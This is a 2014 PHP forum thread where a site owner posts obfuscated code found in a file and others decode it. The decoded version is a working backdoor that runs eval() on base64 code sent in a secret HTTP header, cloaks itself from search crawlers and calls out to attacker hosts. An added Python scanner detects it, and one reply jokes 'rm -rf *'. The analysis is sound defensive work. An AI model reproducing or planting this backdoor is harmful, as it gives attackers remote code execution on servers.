
Is it a virus or just a simple PHP function?

Discussion in 'PHP' started by Jaden Alvin, Apr 18, 2014.

  1. #1
    Hi

    I need help. Today I saw some strange code in my PHP file while making changes. The site is working fine, but I'm worried that this may be a virus. Please help with this.

    <?php                                                                                                                                                                 /*versio:2.17*/$IllI=0;if (!function_exists('I111I1ll')){$GLOBALS['IllI'] = '=Y3VybAX2luaXQYWxsb3dfdXJsX2ZvcGVuX$O%DMQ{S?mPDaHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cw}DX3NldG9wdAGediX2V4ZWMJndheT1jdXJsoYYSLwjb3Nvbi5pbg!EYS1pbi1hLWNpcmNsZS5jb20XJkcGhwYWlkZS5jb20dwWWWV8@}OgLZGlzcGxheV9lcnJvcnMSZGV0ZXJtaW5hdG9yUp^ZnRwMTMAMi4xNw~ebUVFPMDBRT08LYmFzZTY0X2RlY29kZQ}RAYmFzZTY0X2VuY29kZQwSFRUUF9IT1NU{dW5pb24c2VsZWN0MvnUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUVUVVFUllfU1RSSU5HsPHwj_PwoKVE1QG BVEVNUARVE1QRElSWRdG1wE)ld3AtY29udGVudC91cGxvYWRzLL.d3AtY29udGVudC9jYWNoZQdXBsb2FkX3RtcF9kaXIxL3RtcA(LgRodmVyc2lv_?kLQthLXBocAlbVSFRUUF9FWEVDUEhQb3V0b2swOSFRUUF9VU0VSX0FHRU5UGIwQLAZ29vZ2xlLHlhaG9vLGJpbmcsbXNuLGFzayxiYWlkdSxjcmF3bGVyLHlhbmRleA~d;L3BnLnBocD91PQbJms9JnQ9cGhwJnA9Z$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';function I111I1ll($a, $b){$c=$GLOBALS['IllI']; $d=pack('H*','6261736'.'536345f6465636f6465'); return $d(substr($c, $a, $b));};$IIII1l1I1 = I111I1ll(3239, 16);$IIII1l1I1("/IllI1lI11/e", I111I1ll(681, 2558), "IllI1lI11");};?>
    Thanks
     
    Jaden Alvin, Apr 18, 2014 IP
  2. HackTactics

    #2
    Very interesting find. I'm this far into decoding it:
    
    <?php
    if(!defined("determinator")){
        function determinator_feof($Q0QO0Q, &$QOOOOO = NULL){
            $QOOOOO = microtime(true);
            return feof($Q0QO0Q);
        }
       
        function getfile($II1llI, $QQQ0Q0){
            $IllIIl = I111I1ll(1, 6);
            $III111 = $IllIIl.I111I1ll(7, 7);
            @ini_set(I111I1ll(14, 20), 1);
    
            if (@ini_get(I111I1ll(14, 20)) == I111I1ll(39, 2)){
                $Il1lI1=@file_get_contents(I111I1ll(47, 10) . $II1llI . $QQQ0Q0. I111I1ll(57, 30));
                return $Il1lI1;
            } elseif (function_exists($III111)){
                $QQ00OQ = @$III111();
                $II1111 = $IllIIl.I111I1ll(89, 10);
                $QO00QO = $IllIIl.I111I1ll(103, 7);
                @$II1111($QQ00OQ, CURLOPT_URL, I111I1ll(47, 10) . $II1llI . $QQQ0Q0. I111I1ll(110, 12));
                @$II1111($QQ00OQ, CURLOPT_HEADER,false); @$II1111($QQ00OQ, CURLOPT_RETURNTRANSFER,true);
                @$II1111($QQ00OQ, CURLOPT_CONNECTTIMEOUT, 5);
                $I111II = @$QO00QO($QQ00OQ);
                @curl_close($QQ00OQ);
                if (empty($I111II)){
                    $I111II = I111I1ll(125, 0);
                } 
                return $I111II;
            } else {
                $Q0QO0Q = @fsockopen($II1llI, 80, $Q0QOQ0, $I1llll, 5);
                if ($Q0QO0Q){ 
                    $QOQ0QQ = I111I1ll(125, 0);
                    $QOOOOO = NULL;
                    @fputs($Q0QO0Q, "GET {$QQQ0Q0}&way=socket HTTP/1.0\r\nHost: {$II1llI}\r\n");
                    $QQ0O0Q = PHP_OS.I111I1ll(126, 2).PHP_VERSION;
                    @fputs($Q0QO0Q, "User-Agent: {$QQ0O0Q}\r\n\r\n");
                    while(!determinator_feof($Q0QO0Q, $QOOOOO) && (microtime(true) - $QOOOOO) < 2){
                        $QOQ0QQ .= @fgets($Q0QO0Q, 128);
                    } 
                    @fclose($Q0QO0Q);
                    $Q0OO0Q = explode("\r\n\r\n", $QOQ0QQ);
                    unset($Q0OO0Q[0]);
                    return implode("\r\n\r\n", $Q0OO0Q);
                } 
            }
        } 
        $QO0Q00 = Array(I111I1ll(129, 10), I111I1ll(141, 23), I111I1ll(167, 15));
    
        function write($I11l1I,$I1I11l){
            if ($Q0OQQQ=@fopen($I11l1I,I111I1ll(182, 2))){
                @fwrite($Q0OQQQ,$I1I11l);
                @fclose($Q0OQQQ);
            }
        }
    
        function output($IlllII, $QOOQ00){
            echo I111I1ll(186, 3).$IlllII.I111I1ll(191, 2).$QOOQ00."\r\n"; 
        }
    
        @ini_set(I111I1ll(194, 19), 0); 
       
        define(I111I1ll(214, 16), 1);
    
        $II1lll=I111I1ll(233, 7);
        $IlIllI=I111I1ll(241, 6);
        $I11l1l=I111I1ll(250, 11);
        $Q00OOQ=I111I1ll(262, 18);
        $Il1IIl=I111I1ll(283, 18);
        $II1llI=I111I1ll(47, 10);
        $II1llI.=strtolower(@$_SERVER[I111I1ll(302, 12)]);
    
        foreach ($_GET as $IlllII=>$QOOQ00){
            if (strpos($QOOQ00,I111I1ll(315, 7))){
                $_GET[$IlllII]=I111I1ll(125, 0);
            } elseif (strpos($QOOQ00,I111I1ll(322, 8))){
                $_GET[$IlllII]=I111I1ll(125, 0);
            } 
        } 
       
        if(!isset($_SERVER[I111I1ll(333, 15)])) {
            $_SERVER[I111I1ll(333, 15)] = @$_SERVER[I111I1ll(349, 15)];
            if(@$_SERVER[I111I1ll(365, 16)]) {
                $_SERVER[I111I1ll(333, 15)] .= I111I1ll(387, 2) . @$_SERVER[I111I1ll(365, 16)];
            }
        }
    
        if ($QQ0QOO=$II1llI.@$_SERVER[I111I1ll(333, 15)]){ 
            $QOQOQO=@md5($II1llI.$IlIllI.PHP_OS.$I11l1l);
            $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
            $IIlll1 = Array( @$_SERVER[I111I1ll(391, 4)], @$_SERVER[I111I1ll(398, 6)], @$_ENV[I111I1ll(391, 4)], @$_ENV[I111I1ll(405, 8)], @$_ENV[I111I1ll(398, 6)], $Il1Ill.I111I1ll(415, 4), $Il1Ill.I111I1ll(422, 24), $Il1Ill.I111I1ll(449, 22), @ini_get(I111I1ll(471, 19)), I111I1ll(491, 6), );
    
            foreach ($IIlll1 as $IIlI1I){
                if (!empty($IIlI1I)){
                    $IIlI1I.=DIRECTORY_SEPARATOR;
                    if (@is_writable($IIlI1I)){
                        $Il1Ill = $IIlI1I;
                        break;
                    }
                }
            }
    
            $tmp=$Il1Ill.I111I1ll(498, 2).$QOQOQO;
            if (@$_SERVER["HTTP_Y_AUTH"]==$QOQOQO){
            echo "\r\n"; @output(I111I1ll(502, 8), $IlIllI.I111I1ll(513, 2).$II1lll.I111I1ll(517, 6));
    
            if ($QOOOOQ=$Q00OOQ(@$_SERVER[I111I1ll(526, 16)])){
                @eval($QOOOOQ);
                echo "\r\n"; @output(I111I1ll(542, 4), I111I1ll(546, 3));
            } 
           
            exit(0);
        } 
       
        if (@is_file($tmp)){
            @touch($tmp);
            @include_once($tmp);
        } else{
    
        $QQ0QOO=@urlencode($QQ0QOO);
        $Illlll = @strtolower(@$_SERVER[I111I1ll(551, 20)]);
        foreach (explode(I111I1ll(575, 2), I111I1ll(577, 62)) as $III11l){
            if (strpos($Illlll, $III11l)!==False){
                if (@touch($tmp)){ 
                    $QQQ0Q0 = I111I1ll(642, 14).$QQ0QOO.I111I1ll(657, 4).$QOQOQO.I111I1ll(661, 12).$II1lll.I111I1ll(675, 4).$IlIllI;
                    $I1lllI = getfile($QO0Q00[0], $QQQ0Q0);
                    @touch($tmp);
                }
                break;
            } 
        }
    } } }
    ?>
    
     
    Last edited: Apr 18, 2014
    HackTactics, Apr 18, 2014 IP
    Vooler likes this.
  3. HackTactics

    #3
    Which translates to:
    <?php
    if(!defined("determinator")){
        function determinator_feof($Q0QO0Q, &$QOOOOO = NULL){
            $QOOOOO = microtime(true);
            return feof($Q0QO0Q);
        }
       
        function getfile($II1llI, $QQQ0Q0){
            $IllIIl = curl_init;
            @ini_set("allow_url_fopen", 1);
    
            if (@ini_get("allow_url_fopen") == 1){
                $Il1lI1=@file_get_contents("http://" . $II1llI . $QQQ0Q0. "&way=file_get_contents");
                return $Il1lI1;
            } elseif (function_exists($III111)){
                $QQ00OQ = @$III111();
                $II1111 = $IllIIl."_setopt";
                $QO00QO = $IllIIl."_exec";
                @$II1111($QQ00OQ, CURLOPT_URL, "http://" . $II1llI . $QQQ0Q0. "&way=curl");
                @$II1111($QQ00OQ, CURLOPT_HEADER,false); @$II1111($QQ00OQ, CURLOPT_RETURNTRANSFER,true);
                @$II1111($QQ00OQ, CURLOPT_CONNECTTIMEOUT, 5);
                $I111II = @$QO00QO($QQ00OQ);
                @curl_close($QQ00OQ);
                if (empty($I111II)){
                    $I111II = "";
                }
                return $I111II;
            } else {
                $Q0QO0Q = @fsockopen($II1llI, 80, $Q0QOQ0, $I1llll, 5);
                if ($Q0QO0Q){
                    $QOQ0QQ = "";
                    $QOOOOO = NULL;
                    @fputs($Q0QO0Q, "GET {$QQQ0Q0}&way=socket HTTP/1.0\r\nHost: {$II1llI}\r\n");
                    $QQ0O0Q = PHP_OS."/".PHP_VERSION;
                    @fputs($Q0QO0Q, "User-Agent: {$QQ0O0Q}\r\n\r\n");
                    while(!determinator_feof($Q0QO0Q, $QOOOOO) && (microtime(true) - $QOOOOO) < 2){
                        $QOQ0QQ .= @fgets($Q0QO0Q, 128);
                    }
                    @fclose($Q0QO0Q);
                    $Q0OO0Q = explode("\r\n\r\n", $QOQ0QQ);
                    unset($Q0OO0Q[0]);
                    return implode("\r\n\r\n", $Q0OO0Q);
                }
            }
        }
        $QO0Q00 = Array("oson.in", "a-in-a-circle.com", "phpaide.com");
    
        function write($I11l1I,$I1I11l){
            if ($Q0OQQQ=@fopen($I11l1I,"w")){
                @fwrite($Q0OQQQ,$I1I11l);
                @fclose($Q0OQQQ);
            }
        }
    
        function output($IlllII, $QOOQ00){
            echo "Y_".$IlllII.":".$QOOQ00."\r\n";
        }
    
        @ini_set("display_errors", 0);
       
        define("determinator", 1);
    
        $II1lll="ftp13";
        $IlIllI="2.17";
        $I11l1l="QQO00QOO";
        $Q00OOQ="base64_decode";
        $Il1IIl="base64_encode";
        $II1llI="http://";
        $II1llI.=strtolower(@$_SERVER["HTTP_HOST"]);
    
        foreach ($_GET as $IlllII=>$QOOQ00){
            if (strpos($QOOQ00,"union")){
                $_GET[$IlllII]="";
            } elseif (strpos($QOOQ00,"select")){
                $_GET[$IlllII]="";
            }
        }
       
        if(!isset($_SERVER["REQUEST_URI"])) {
            $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
            if(@$_SERVER["QUERY_STRING"]) {
                $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
            }
        }
    
        if ($QQ0QOO=$II1llI.@$_SERVER["REQUEST_URI"]){
            $QOQOQO=@md5($II1llI.$IlIllI.PHP_OS.$I11l1l);
            $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
            $IIlll1 = Array( @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], $Il1Ill."tmp", $Il1Ill."wp-content/uploads", $Il1Ill."wp-content/cache", @ini_get("upload_tmp_dir"), "/tmp", );
    
            foreach ($IIlll1 as $IIlI1I){
                if (!empty($IIlI1I)){
                    $IIlI1I.=DIRECTORY_SEPARATOR;
                    if (@is_writable($IIlI1I)){
                        $Il1Ill = $IIlI1I;
                        break;
                    }
                }
            }
    
            $tmp=$Il1Ill.".".$QOQOQO;
            if (@$_SERVER["HTTP_Y_AUTH"]==$QOQOQO){
            echo "\r\n"; @output("versio", $IlIllI."-".$II1lll."-php");
    
            if ($QOOOOQ=$Q00OOQ(@$_SERVER["HTTP_EXECPHP"])){
                @eval($QOOOOQ);
                echo "\r\n"; @output("out", "ok");
            }
           
            exit(0);
        }
       
        if (@is_file($tmp)){
            @touch($tmp);
            @include_once($tmp);
        } else{
    
        $QQ0QOO=@urlencode($QQ0QOO);
        $Illlll = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
        foreach (explode(",", "google,yahoo,bing,msn,ask,baidu,crawler,yandex") as $III11l){
            if (strpos($Illlll, $III11l)!==False){
                if (@touch($tmp)){
                    $QQQ0Q0 = "/pg.php?u=".$QQ0QOO."&k=".$QOQOQO."&t=php&p=".$II1lll."&v=".$IlIllI;
                    $I1lllI = getfile($QO0Q00[0], $QQQ0Q0);
                    @touch($tmp);
                }
                break;
            }
        }
    } } }
    ?>
    I am still trying to figure out what it does; it looks malicious, I'd remove it.
     
    HackTactics, Apr 18, 2014 IP
    sarahk likes this.
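    As an added example, not code from any of the posters, here are two defender-side checks built only from what is visible in the loader in #1 and the decoded body in #3: a one-liner that reverses the pack('H*', ...) trick to show which function name the loader hides, a scanner for the static indicators the thread exposes (the /*versio:*/ marker, the determinator guard, the hex-packed name, a regex literal ending in /e as the first argument of a call, the Y_AUTH / EXECPHP header check that feeds eval(), and the crawler cloaking list), and a filter for the hidden ".<32 hex>" marker file the decoded code drops into the first writable directory it finds. Labelled assumptions: reading the 16-character base64 substring at offset 3239 as preg_replace is inferred from the three-argument call with a "/e" pattern, not decoded on the page; the PHP samples and the file listing are constructed for the demonstration.

```python
"""Added example for this thread (not code from any of the posters): two
defender-side checks built from the static indicators visible in the loader
posted in #1 and the decoded body posted in #3.

Assumptions, labelled: the identification of the 16-character base64
substring at offset 3239 as "preg_replace" is inferred from the "/e"
modifier and the three-argument call shape, not decoded on the page; the
PHP samples and the file listing below are constructed for the demo.
"""
import re
from pathlib import PurePosixPath

# Hex literal as it appears in the loader's pack('H*', ...) call. Splitting
# it into two string constants only breaks the constant up for naive
# signature scanners; joining them restores the hex.
PACKED_HEX = "6261736" + "536345f6465636f6465"


def decode_packed_name(hex_str: str = PACKED_HEX) -> str:
    """Reverse PHP's pack('H*', $hex): hex digits -> raw bytes -> ASCII.
    The result is the name of the function the loader applies to every
    substring of its base64 blob."""
    return bytes.fromhex(hex_str).decode("ascii")


# Static indicators taken from the code in the thread: (label, pattern).
INDICATORS = [
    ("version marker comment", re.compile(r"/\*versio:\d+\.\d+\*/")),
    ("determinator guard", re.compile(r"defined\(\s*[\"']determinator[\"']\s*\)")),
    ("hex-packed function name", re.compile(r"pack\(\s*'H\*'\s*,")),
    # A regex literal ending in /e as the first argument of a call: the /e
    # modifier makes the replacement string be eval()'d (removed in PHP 7).
    ("regex /e eval modifier", re.compile(r"\(\s*[\"']/[^\"']*/e[\"']\s*,")),
    ("header-triggered eval backdoor", re.compile(r"HTTP_Y_AUTH|HTTP_EXECPHP")),
    ("search-engine cloaking list",
     re.compile(r"google,yahoo,bing,msn,ask,baidu,crawler,yandex")),
]


def scan_php_source(source: str) -> list:
    """Return the labels of every indicator found in a PHP source string."""
    return [label for label, rx in INDICATORS if rx.search(source)]


# The decoded code builds its marker file as <writable dir> . "." . md5(...),
# i.e. a dotfile whose name is exactly 32 lowercase hex digits.
HIDDEN_MARKER = re.compile(r"^\.[0-9a-f]{32}$")


def find_dropper_files(paths) -> list:
    """From an iterable of POSIX path strings, return those whose basename
    matches the ".<md5>" marker file the decoded code drops."""
    return [p for p in paths if HIDDEN_MARKER.match(PurePosixPath(p).name)]


# Constructed sample: the loader shape from #1 plus the backdoor lines from
# #3, with the long base64 blob replaced by a placeholder.
MALICIOUS_SAMPLE = r"""<?php /*versio:2.17*/ $IllI=0;
if (!function_exists('I111I1ll')){ $GLOBALS['IllI'] = 'BASE64-BLOB-OMITTED';
function I111I1ll($a, $b){ $d=pack('H*','6261736'.'536345f6465636f6465'); return $d(substr($GLOBALS['IllI'], $a, $b)); }
$f = I111I1ll(3239, 16); $f("/IllI1lI11/e", I111I1ll(681, 2558), "IllI1lI11"); }
if(!defined("determinator")){
  if (@$_SERVER["HTTP_Y_AUTH"]==$key){ @eval(base64_decode(@$_SERVER["HTTP_EXECPHP"])); }
  foreach (explode(",", "google,yahoo,bing,msn,ask,baidu,crawler,yandex") as $bot) {}
}
?>"""

# Constructed sample: legitimate pack() and preg_replace() use that must not
# trip the scanner.
BENIGN_SAMPLE = r"""<?php
$packed = pack('N', 42);
$clean = preg_replace("/\s+/", " ", $input);
?>"""

# Constructed directory listing; the two hex names are made-up examples.
SAMPLE_LISTING = [
    "/var/www/html/wp-content/uploads/.3f8a2c1e9b7d4a6f0c2e8b1d5a9f7c3e",
    "/var/www/html/wp-content/uploads/2014/04/photo.jpg",
    "/var/www/html/.htaccess",
    "/tmp/.deadbeefdeadbeefdeadbeefdeadbeef",
]

if __name__ == "__main__":
    print("pack('H*', ...) hides:", decode_packed_name())
    print("malicious sample hits:", scan_php_source(MALICIOUS_SAMPLE))
    print("benign sample hits:", scan_php_source(BENIGN_SAMPLE))
    print("marker files:", find_dropper_files(SAMPLE_LISTING))
```

    Running this prints base64_decode for the packed name, all six indicator labels for the constructed malicious sample, nothing for the benign sample, and the two dotfile paths from the listing. On a real host, feed scan_php_source() the contents of each .php file under the web root and find_dropper_files() a recursive listing of the temp and wp-content directories the decoded code probes.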
  4. superprg

    #4
    Is this in the WordPress code?
    Yes, it's malicious code. Please remove it ASAP.
    Search for "defined("determinator")" in Google and you will get more details about it.
     
    superprg, Apr 18, 2014 IP
  5. HackTactics

    #5
    That said, it must be old, as "oson.in" is no longer an owned domain, so it was malicious code, but still remove it.
     
    HackTactics, Apr 18, 2014 IP
  6. VegasHOOkUp

    #6
    Rule of thumb! -- If code is not readable to a coder.... or looks malicious... * rm -rf * remove the code!
    It's better to be safe than sorry.
     
    VegasHOOkUp, Apr 19, 2014 IP
    sarahk likes this.
  7. shavic

    #7
    Remove it ASAP. You never know what it could harm.
     
    shavic, Apr 22, 2014 IP
  8. GuiltyCrown

    #8
    It's usually code added automatically to some pages; it happened to me in the past as well. It will lead to Google marking your website as spam, and when someone clicks your link Google will warn them there might be viruses on your website.

    It seems to be using sockets, so it's definitely calling some other page and maybe downloading or sending confidential data to them.
     
    GuiltyCrown, Apr 23, 2014 IP